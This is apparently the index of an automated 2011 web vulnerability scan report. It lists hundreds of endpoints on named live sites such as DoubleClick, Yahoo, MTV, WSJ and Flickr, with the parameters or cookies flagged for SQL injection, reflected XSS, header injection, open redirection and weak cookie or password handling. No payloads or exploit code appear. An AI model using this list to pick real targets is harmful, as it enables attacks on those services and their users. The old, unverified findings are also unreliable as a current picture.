XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06142011-01

Report generated by XSS.CX at Tue Jun 14 08:10:34 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]

1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]

1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]

1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]

1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]

1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]

1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]

1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]

1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]

1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]

1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]

1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]

1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]

3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]

3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]

3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]

3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]

3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]

3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]

3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]

3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]

3.25. http://js.revsci.net/gateway/gw.js [csid parameter]

3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]

3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]

3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]

3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]

3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]

3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]

3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]

3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]

3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]

3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]

3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]

3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]

3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]

3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]

3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]

3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]

3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]

3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]

3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]

3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]

3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]

3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]

3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]

3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]

3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]

3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]

3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]

3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]

3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]

3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]

3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]

3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]

3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]

3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]

3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]

3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]

3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]

3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]

4. Flash cross-domain policy

4.1. http://0.gravatar.com/crossdomain.xml

4.2. http://1.gravatar.com/crossdomain.xml

4.3. http://2.gravatar.com/crossdomain.xml

4.4. http://a.tribalfusion.com/crossdomain.xml

4.5. http://ad.doubleclick.net/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ar.voicefive.com/crossdomain.xml

4.8. http://b.scorecardresearch.com/crossdomain.xml

4.9. http://b.voicefive.com/crossdomain.xml

4.10. http://bs.serving-sys.com/crossdomain.xml

4.11. http://community.mtv.com/crossdomain.xml

4.12. http://d3.zedo.com/crossdomain.xml

4.13. http://d7.zedo.com/crossdomain.xml

4.14. http://daapiak.flux.com/crossdomain.xml

4.15. http://ds.serving-sys.com/crossdomain.xml

4.16. http://en.gravatar.com/crossdomain.xml

4.17. http://farm1.static.flickr.com/crossdomain.xml

4.18. http://farm2.static.flickr.com/crossdomain.xml

4.19. http://farm3.static.flickr.com/crossdomain.xml

4.20. http://farm4.static.flickr.com/crossdomain.xml

4.21. http://farm5.static.flickr.com/crossdomain.xml

4.22. http://farm6.static.flickr.com/crossdomain.xml

4.23. http://fls.doubleclick.net/crossdomain.xml

4.24. http://gs.mtv.com/crossdomain.xml

4.25. http://i0.poll.fm/crossdomain.xml

4.26. http://ib.adnxs.com/crossdomain.xml

4.27. http://imx.mtv.com/crossdomain.xml

4.28. http://js.revsci.net/crossdomain.xml

4.29. http://l.yimg.com/crossdomain.xml

4.30. http://log30.doubleverify.com/crossdomain.xml

4.31. http://m.webtrends.com/crossdomain.xml

4.32. http://m1.zedo.com/crossdomain.xml

4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml

4.34. http://mtv.mtvnimages.com/crossdomain.xml

4.35. http://now.eloqua.com/crossdomain.xml

4.36. http://om.dowjoneson.com/crossdomain.xml

4.37. http://ping1.unicast.com/crossdomain.xml

4.38. http://pix04.revsci.net/crossdomain.xml

4.39. http://pixel.quantserve.com/crossdomain.xml

4.40. http://puma.vizu.com/crossdomain.xml

4.41. http://s.gravatar.com/crossdomain.xml

4.42. http://secure-us.imrworldwide.com/crossdomain.xml

4.43. http://spd.pointroll.com/crossdomain.xml

4.44. http://spe.atdmt.com/crossdomain.xml

4.45. http://speed.pointroll.com/crossdomain.xml

4.46. http://static0.fluxstatic.com/crossdomain.xml

4.47. http://static1.fluxstatic.com/crossdomain.xml

4.48. http://static2.fluxstatic.com/crossdomain.xml

4.49. http://static3.fluxstatic.com/crossdomain.xml

4.50. http://t.flux.com/crossdomain.xml

4.51. http://t.pointroll.com/crossdomain.xml

4.52. http://tcr.tynt.com/crossdomain.xml

4.53. http://viamtv.112.2o7.net/crossdomain.xml

4.54. http://widgets.flux.com/crossdomain.xml

4.55. http://widgetsak.flux.com/crossdomain.xml

4.56. http://www.forexfactory.com/crossdomain.xml

4.57. http://www.mtv.com/crossdomain.xml

4.58. http://ad.wsod.com/crossdomain.xml

4.59. http://advertising.yahoo.com/crossdomain.xml

4.60. http://api.tweetmeme.com/crossdomain.xml

4.61. http://cm.mtv.overture.com/crossdomain.xml

4.62. http://feeds.bbci.co.uk/crossdomain.xml

4.63. http://geo.yahoo.com/crossdomain.xml

4.64. http://googleads.g.doubleclick.net/crossdomain.xml

4.65. http://my.yahoo.com/crossdomain.xml

4.66. http://newsrss.bbc.co.uk/crossdomain.xml

4.67. http://online.wsj.com/crossdomain.xml

4.68. http://p.opt.fimserve.com/crossdomain.xml

4.69. http://static.ak.fbcdn.net/crossdomain.xml

4.70. http://us.adserver.yahoo.com/crossdomain.xml

4.71. http://www.facebook.com/crossdomain.xml

4.72. http://api.twitter.com/crossdomain.xml

4.73. https://edit.yahoo.com/crossdomain.xml

4.74. http://s0.videopress.com/crossdomain.xml

4.75. http://stats.wordpress.com/crossdomain.xml

4.76. http://videopress.com/crossdomain.xml

4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.4. http://b.voicefive.com/clientaccesspolicy.xml

5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml

5.6. http://om.dowjoneson.com/clientaccesspolicy.xml

5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.8. http://spd.pointroll.com/clientaccesspolicy.xml

5.9. http://spe.atdmt.com/clientaccesspolicy.xml

5.10. http://speed.pointroll.com/clientaccesspolicy.xml

5.11. http://stats.wordpress.com/clientaccesspolicy.xml

5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml

5.13. http://windows.microsoft.com/clientaccesspolicy.xml

5.14. http://js.microsoft.com/clientaccesspolicy.xml

5.15. http://www.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://community.mtv.com/Overlays/LogIn.aspx

6.2. http://en.gravatar.com/

6.3. http://en.gravatar.com/site/login/%252F

6.4. http://members.pega.com/login.asp

6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.7. http://www.livewithoscar.com/Calendar.aspx

6.8. http://www.livewithoscar.com/Chat.aspx

6.9. http://www.livewithoscar.com/DailyOmni.aspx

6.10. http://www.livewithoscar.com/FlashIframe.aspx

7. XML injection

7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]

7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]

7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

8. Session token in URL

8.1. http://pixel.alexametrics.com/atrk.gif

8.2. http://www.facebook.com/extern/login_status.php

9. SSL certificate

9.1. https://login.yahoo.com/

9.2. https://buy.wsj.com/

9.3. https://edit.yahoo.com/

9.4. https://en.wordpress.com/

9.5. https://login21.marketingsolutions.yahoo.com/

9.6. https://marketingsolutions.login.yahoo.com/

10. Open redirection

10.1. http://b.scorecardresearch.com/r [d.c parameter]

10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

11. Cookie scoped to parent domain

11.1. http://a.analytics.yahoo.com/fpc.pl

11.2. http://a.analytics.yahoo.com/p.pl

11.3. http://gs.mtv.com/games/playgame.php

11.4. http://www.forexfactory.com/excal.php

11.5. http://a.tribalfusion.com/j.ad

11.6. http://ad.doubleclick.net/clk

11.7. http://ads.pointroll.com/PortalServe/

11.8. http://api.bizographics.com/v1/profile.json

11.9. http://ar.voicefive.com/b/recruitBeacon.pli

11.10. http://b.scorecardresearch.com/b

11.11. http://b.scorecardresearch.com/r

11.12. http://b.voicefive.com/p

11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.14. http://c.microsoft.com/trans_pixel.asp

11.15. http://cf.addthis.com/red/p.json

11.16. http://cm.mtv.overture.com/js_flat_1_0/

11.17. http://en.wordpress.com/signup/

11.18. http://ib.adnxs.com/pxj

11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

11.21. http://js.revsci.net/gateway/gw.js

11.22. http://leadback.advertising.com/adcedge/lb

11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

11.24. http://p.opt.fimserve.com/bht/

11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.27. http://px.owneriq.net/ep

11.28. http://stgapi.choicestream.com/instr/csanywhere.js

11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

11.35. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

11.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

11.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

11.38. http://www.alexa.com/

11.39. http://www.bizographics.com/collect/

11.40. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

11.41. http://www.flickr.com/about/

11.42. http://www.flickr.com/abuse/

11.43. http://www.flickr.com/beacon_page_timings.gne

11.44. http://www.flickr.com/flanal_event.gne

11.45. http://www.flickr.com/fragment.gne

11.46. http://www.flickr.com/report_abuse.gne

11.47. http://www.flickr.com/signin

11.48. http://www.pega.com/user

12. Cookie without HttpOnly flag set

12.1. http://a.analytics.yahoo.com/fpc.pl

12.2. http://a.analytics.yahoo.com/p.pl

12.3. http://gs.mtv.com/games/playgame.php

12.4. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

12.5. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

12.6. http://a.tribalfusion.com/j.ad

12.7. http://ad.doubleclick.net/clk

12.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

12.9. http://ad.yieldmanager.com/imp

12.10. http://ads.pointroll.com/PortalServe/

12.11. http://api.bizographics.com/v1/profile.json

12.12. http://ar.voicefive.com/b/recruitBeacon.pli

12.13. http://aux1.forexfactory.com/www/delivery/lg.php

12.14. http://b.scorecardresearch.com/b

12.15. http://b.scorecardresearch.com/r

12.16. http://b.voicefive.com/p

12.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.18. http://c.microsoft.com/trans_pixel.asp

12.19. http://cf.addthis.com/red/p.json

12.20. http://cm.mtv.overture.com/js_flat_1_0/

12.21. http://community.mtv.com/Overlays/LogIn.aspx

12.22. http://community.mtv.com/ScriptResource.axd

12.23. http://community.mtv.com/WebResource.axd

12.24. http://en.wordpress.com/signup/

12.25. http://flickr.com/

12.26. http://js.revsci.net/gateway/gw.js

12.27. http://leadback.advertising.com/adcedge/lb

12.28. http://m.webtrends.com/dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif

12.29. http://my.yahoo.com/e/df

12.30. http://p.opt.fimserve.com/bht/

12.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.32. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

12.33. http://px.owneriq.net/ep

12.34. http://sales.liveperson.net/hc/12987554/

12.35. http://stgapi.choicestream.com/instr/csanywhere.js

12.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

12.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

12.38. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

12.39. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

12.40. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

12.41. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

12.42. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

12.43. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

12.44. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

12.45. http://www.alexa.com/

12.46. http://www.bizographics.com/collect/

12.47. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

12.48. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

12.49. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

12.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

12.51. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

12.52. http://www.flickr.com/about/

12.53. http://www.flickr.com/abuse/

12.54. http://www.flickr.com/beacon_page_timings.gne

12.55. http://www.flickr.com/flanal_event.gne

12.56. http://www.flickr.com/fragment.gne

12.57. http://www.flickr.com/report_abuse.gne

12.58. http://www.flickr.com/signin

12.59. http://www.forexfactory.com/excal.php

12.60. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

13. Password field with autocomplete enabled

13.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.2. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.3. http://community.mtv.com/Overlays/LogIn.aspx

13.4. http://community.mtv.com/Overlays/LogIn.aspx

13.5. http://community.mtv.com/Overlays/LogIn.aspx

13.6. http://community.mtv.com/Overlays/LogIn.aspx

13.7. https://edit.yahoo.com/registration

13.8. http://en.gravatar.com/

13.9. http://en.gravatar.com/site/login/%252F

13.10. https://en.wordpress.com/signup/

13.11. https://login.yahoo.com/config/login

13.12. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

13.13. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.14. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.15. http://wordpress.com/

13.16. http://www.livewithoscar.com/Calendar.aspx

13.17. http://www.livewithoscar.com/Chat.aspx

13.18. http://www.livewithoscar.com/DailyOmni.aspx

13.19. http://www.livewithoscar.com/FlashIframe.aspx

14. Source code disclosure

15. Referer-dependent response

15.1. http://api.bizographics.com/v1/profile.json

15.2. http://use.typekit.com/k/nop2chq-e.css

15.3. http://www.facebook.com/plugins/fan.php

15.4. http://www.facebook.com/plugins/like.php

15.5. http://www.flickr.com/about/

15.6. http://www.flickr.com/abuse/

15.7. http://www.flickr.com/apps/badge/badge_iframe.gne

15.8. http://www.flickr.com/report_abuse.gne

16. Cross-domain POST

17. SSL cookie without secure flag set

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

18.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

18.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

18.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.6. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.7. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.8. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.9. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.10. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.11. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.12. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.13. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.14. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

18.15. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

18.16. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.17. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.18. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/_hp

18.19. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/shows/_mn

18.20. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.21. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.22. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.23. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.24. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/index

18.25. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.26. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.27. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.28. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.29. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.30. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.31. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

18.32. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

18.33. http://api.twitter.com/1/FanSided/lists//statuses.json

18.34. http://community.mtv.com/Overlays/LogIn.aspx

18.35. https://edit.yahoo.com/forgotroot

18.36. https://edit.yahoo.com/registration

18.37. http://fls.doubleclick.net/activityi

18.38. https://login.yahoo.com/config/login

18.39. https://login.yahoo.com/config/login

18.40. http://members.pega.com/cookiecheck.asp

18.41. http://members.pega.com/pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css

18.42. http://my.yahoo.com/darla/fc.php

18.43. http://my.yahoo.com/darla/fc.php

18.44. http://my.yahoo.com/darla/fc.php

18.45. http://my.yahoo.com/darla/fc.php

18.46. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

18.47. http://platform.twitter.com/widgets/follow_button.html

18.48. http://platform0.twitter.com/widgets/follow_button.html

18.49. http://s0.videopress.com/js/videopress.js

18.50. http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js

18.51. http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js

18.52. http://us.havaianas.com/front/templates/fragments/recently-viewed.jsp

18.53. http://widgets.flux.com/-/GetAuthCookie.ashx

18.54. http://widgets.flux.com/-/GetAuthCookie.ashx

18.55. http://wordpress.com/signup/

18.56. http://www.facebook.com/plugins/fan.php

18.57. http://www.facebook.com/plugins/like.php

18.58. http://www.flickr.com/apps/badge/badge_iframe.gne

18.59. http://www.flickr.com/apps/badge/badge_iframe.gne

18.60. http://www.flickr.com/apps/badge/badge_iframe.gne

18.61. http://www.flickr.com/fragment.gne

18.62. http://www.google.com/search

18.63. http://www.mtv.com/games/arcade/game/play.jhtml

18.64. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

18.65. http://www.mtv.com/xd_flux.html

19. Cross-domain script include

19.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

19.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

19.3. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

19.4. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.5. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.6. http://chartupload.com/

19.7. http://chartupload.com/gallery.php

19.8. http://community.mtv.com/Overlays/LogIn.aspx

19.9. http://d3.zedo.com//ads3/k/1219/959680/2317/1000002/i.js

19.10. http://en.gravatar.com/

19.11. http://en.gravatar.com/account/forgot-password/

19.12. http://en.gravatar.com/site/implement

19.13. http://en.gravatar.com/site/login/%252F

19.14. http://en.gravatar.com/site/signup/

19.15. https://en.wordpress.com/signup/

19.16. http://intensedebate.com/

19.17. https://login.yahoo.com/config/login

19.18. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

19.19. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

19.20. http://us.havaianas.com/MYOH.html

19.21. http://videopress.com/

19.22. http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages

19.23. http://windows.microsoft.com/en-US/internet-explorer/products/ie/home

19.24. http://wordpress.com/

19.25. http://www.alexa.com/

19.26. http://www.facebook.com/plugins/fan.php

19.27. http://www.facebook.com/plugins/like.php

19.28. http://www.flickr.com/

19.29. http://www.flickr.com/about/

19.30. http://www.flickr.com/abuse/

19.31. http://www.flickr.com/apps/badge/badge_iframe.gne

19.32. http://www.flickr.com/report_abuse.gne

19.33. http://www.livewithoscar.com/Calendar.aspx

19.34. http://www.mtv.com/

19.35. http://www.mtv.com/games/arcade/

19.36. http://www.mtv.com/games/arcade/game/play.jhtml

19.37. http://www.mtv.com/music/

19.38. http://www.mtv.com/shows/teen_wolf/series.jhtml

